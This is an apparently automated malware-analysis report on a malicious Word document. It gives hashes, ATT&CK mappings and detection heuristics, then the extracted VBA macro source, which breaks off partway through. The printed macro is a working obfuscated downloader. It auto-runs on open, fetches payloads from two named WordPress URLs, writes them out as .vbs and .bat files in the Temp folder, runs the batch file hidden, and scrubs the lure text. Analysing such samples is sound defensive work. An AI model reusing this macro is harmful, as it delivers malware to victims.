Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 617e96e03ed78aae…

MALICIOUS

Office (OLE)

86.0 KB Created: 2015-08-20 09:57:00 Authoring application: Microsoft Office Word First seen: 2017-12-08
MD5: 30b5d8d38acccab94c6bf44158756ef2 SHA-1: def8883e4bd6335756a212513bd840ea84f4b9f0 SHA-256: 617e96e03ed78aae59ea049c5f856aead2f6cf3ba958aa38629503c6f51fca48
390 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains multiple VBA auto-execution macros (AutoOpen, Auto_Open) designed to run obfuscated code. This code uses the Shell() function and CreateObject to download a payload from the URLs 'luckytravelshop.info/wp-content/uploads/2015/05/8179826378126.txt' or 'plusfashionfinds.com/wp-includes/js/tinymce/'. The presence of an enable-lure heuristic further supports the malicious intent of executing embedded code.

Heuristics 12

  • ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5594 bytes
SHA-256: 5de8f9110c3e007670b25b6e41b2b9a2001afa36c458836bd6c3fd2aa3af1fa8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Auto_Open()
    KyKyKy
End Sub
Sub KyKyKy()
    NJKVBQJ = "12eh j12g jh12g "
    Hakamaka
End Sub
Sub AutoOpen()
    KyKyKy
End Sub
Sub Hakamaka()
    
    Dim MADRID As String, MOTOROLA As String, KIPARIS As String
    Dim TSTS As String, CDDD As String, LNSS As String, STT1 As String, STT2 As String
    Dim PBIn As String, CONT As String
    Dim Ndjs As Integer
    Dim ABTH As String, BBTH As String
    Dim klmn As Integer, TTKK As String
    Dim GEFORCE1 As String, GEFORCE2 As String, hdjshd As Integer
    
    
    KIPARIS = Module2.hhr(92)
    MADRID = Samsung(9842)
    MOTOROLA = "Tem" & "p"
    PH2 = Module1.Goabc(MOTOROLA) + KIPARIS
    
    ART = 315
    BFT = 316

    Ndjs = Sgn(Asc(Module2.Kakarumba(1)) - 342) + 103 + 2
    ATTH = Chr(Ndjs) + Chr(Ndjs + 12) + Chr(Ndjs + 12) + Chr(Ndjs + 8)
    ATTH = ATTH + "://"

    TSTS = ".txt"
    CDDD = "8179826378126.txt"
    LNSS = "sasa" + TSTS
    STT1 = "luckytravelshop.info/w" + "p-content/uploads/2015/05/"
    STT2 = "plusfashionfinds.com/w" + "p-includes/js/tinymce/"
    
    
    PBIn = ATTH + STT1 + CDDD
    
    CONT = Module2.Klklklklklkl(PBIn)
    BHJD = Right(CONT, 15)
    hdjshd = InStr(1, BHJD, "exit")
       
    If (hdjshd = 0) Then
    PBIn = ATTH + STT2 + CDDD
    CONT = Module2.Klklklklklkl(PBIn)
    NFBH = Module2.Klklklklklkl(ATTH + STT2 + LNSS)
    Else
    NFBH = Module2.Klklklklklkl(ATTH + STT1 + LNSS)
    End If
    
    Module2.Crispy (1)
    
    CPLRP1 = "pioneer"
    CPLRP2 = "paytina"
    CPLRP3 = "cranberry"
    
    CONT = Replace(CONT, CPLRP1, PH2, 1)
    CONT = Replace(CONT, CPLRP2, NFBH, 1)
    CONT2 = Replace(CONT, CPLRP3, MADRID, 1)
    
    TTKK = "$"
    
    klmn = CInt(Len(CONT2))
    For i = 1 To klmn
        If (Mid(CONT2, i, 1) = TTKK) Then
            If (Mid(CONT2, i - 1, 1) = TTKK) Then
                GEFORCE1 = Mid(CONT2, 1, i - 2)
                GEFORCE2 = Mid(CONT2, i + 1, klmn - i)
            End If
        End If
    Next i
    
    ABTH = PH2 + MADRID + ".vbs"
    BBTH = PH2 + MADRID + ".bat"
    
    
    Open ABTH For Output As #ART
    Print #ART, GEFORCE1
    Close #ART
    
    Module2.Crispy (1)
     
    Open BBTH For Output As #BFT
    Print #BFT, GEFORCE2
    Close #BFT
    
    Module2.Crispy (1)
    
    QUHDQ = Module2.Fuflmdjoo(BBTH)
    Module1.Hameleon
    
End Sub
Sub Workbook_Open()
    JQUIDHWQ = "qhedjqwgd hqwgfd safgdgjhs"
    KyKyKy
End Sub
Public Function NHdjhasbdhas(a As Object)
NHdjhasbdhas = (a.responsetext)
End Function
Public Function Samsung(a As Integer)
Randomize
Samsung = CStr(Int((a / 2 * Rnd) + a))
End Function
Public Function Creasqwdqwjdk(a As String)
Creasqwdqwjdk = CreateObject(a)
End Function
Public Function Hhqudhqwgyuqwaaa(a As Integer)
Hhqudhqwgyuqwaaa = Sgn(a)
End Function













Attribute VB_Name = "Module1"
Sub Hameleon()
Dim ij As Integer
Dim charCount As Integer
charCount = ActiveDocument.Characters.Count - 1
BHDW = "#"
SSDW = "h12kjeh2 jge"
JFQW = "$"
ij = 0
Do While True
    ij = ij + 1
    If (ActiveDocument.Characters(ij) = BHDW) Then
        If (ActiveDocument.Characters(ij - 1) = JFQW) Then
            ActiveDocument.Range(Start:=0, End:=ij).Delete
            ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack
            Exit Do
        End If
    End If
    If (ij = charCount) Then
        Exit Do
    End If
Loop
End Sub

Public Function Goabc(sps As String)
DNQUHD = "12HE1G EY12GEH1F2 GHhsgdj"
Goabc = Environ(sps)
End Function















Attribute VB_Name = "Module2"
Public Function Fuflmdjoo(a As String)
Dim bydd As Variant
bydd = Shell(a, 0)
FQJISAJD = "qdjq dahjs
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.